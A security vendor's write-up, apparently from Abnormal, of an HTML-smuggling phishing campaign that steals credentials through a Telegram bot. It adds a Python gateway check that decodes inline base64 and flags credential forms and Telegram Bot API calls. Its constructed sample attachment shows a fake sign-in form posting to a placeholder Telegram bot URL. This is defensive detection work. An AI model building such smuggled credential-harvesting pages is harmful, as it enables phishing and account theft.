From Email to Telegram: HTML Smuggling in Action
Dynamic Phishing Interface Rendered Locally, Bypassing Microsoft Defender O365
What is the attack?
Phishing Interface: The email carries a compact web interface, mimicking a document-sharing login page, that is rendered locally on the user's device.
Credential Submission: After entering credentials, the victim is redirected to a OneDrive page showing a decoy PDF.
Data Exfiltration: The victim's geolocation, email address, and credentials are covertly sent through a Telegram bot.
Why did it get through?
Legitimate Source: The email was sent from a domain that passes sender authentication checks.
Self-Contained UI: The sign-in interface operates entirely locally, so it makes no external requests that a gateway could inspect.
Telegram App: Victim information, including credentials and IP address, is transmitted through legitimate Telegram API requests.
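As an added illustration of the indicators described above (example code, not part of this page or of Abnormal's product), the following Python script is a static triage check a mail gateway could run on an HTML attachment: it decodes the inline base64 blob the browser would render and flags the credential form and Telegram Bot API reference hidden inside it. The sample attachments, the indicator weights, and the threshold are constructed assumptions.

```python
import base64
import re
from dataclasses import dataclass, field

# Static indicators of HTML smuggling: the page decodes content in the browser, carries a
# large inline base64 blob, renders a credential form, and references the Telegram Bot API.
INDICATORS = {  # weights are assumptions, not a vendor's scoring
    "browser_side_decode": (2, re.compile(r"\b(?:atob|createObjectURL|TextDecoder)\s*\(", re.I)),
    "large_base64_blob":   (1, re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")),
    "password_field":      (2, re.compile(r"<input[^>]+type\s*=\s*['\"]?password", re.I)),
    "telegram_bot_api":    (3, re.compile(r"api\.telegram\.org/bot\d+:[\w-]+", re.I)),
}
SUSPICIOUS_THRESHOLD = 3  # assumed cut-off; a lone inline image blob (weight 1) stays clean
@dataclass
class Verdict:
    hits: list = field(default_factory=list)  # (indicator, nesting depth) pairs
    score: int = 0
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD

def _scan(text: str, depth: int, verdict: Verdict) -> Verdict:
    for name, (weight, pattern) in INDICATORS.items():
        if pattern.search(text):
            verdict.hits.append((name, depth))
            verdict.score += weight
    if depth >= 2:  # bound the unpacking so nested blobs cannot recurse forever
        return verdict
    # Decode each inline blob and scan what the browser would actually render: that is
    # where the locally rendered sign-in form and the exfiltration endpoint live.
    for blob in INDICATORS["large_base64_blob"][1].findall(text):
        try:
            inner = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # not really base64 (e.g. a long hex digest)
            continue
        _scan(inner, depth + 1, verdict)
    return verdict

def analyze_html_attachment(html: str) -> Verdict:
    return _scan(html, 0, Verdict())

# Constructed samples, not from a real campaign: the smuggled attachment wraps a sign-in
# page in base64 and decodes it client-side; the benign one is a plain invoice.
INNER_PAGE = (
    "<p>Your document is ready. Sign in with your email to view it.</p>"
    '<form><input type="email" name="user"><input type="password" name="pwd"></form>'
    '<script>fetch("https://api.telegram.org/bot123456:PLACEHOLDERTOKEN/")</script>'
)
SMUGGLED_ATTACHMENT = ('<html><body><script>var payload = "' + base64.b64encode(INNER_PAGE.encode()).decode()
                       + '";document.write(atob(payload));</script></body></html>')
BENIGN_ATTACHMENT = "<html><body><h1>Invoice 2024-0042</h1><p>Total due: $120.00.</p></body></html>"
```

The outer HTML alone only shows a decoder call and a blob; the strongest signals surface at depth 1, which is why a gateway that never unpacks the blob sees the same "nothing external" attachment the victim's browser does.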
What is required to solve for this attack?
Behavioral Detection: Abnormal’s Behavioral AI flags never-before-seen senders, unusual email content, and user communication patterns to identify attacks.
Attachment Analysis: Through Content Analysis and Natural Language Processing, Abnormal understands the context, content, and type of attached files.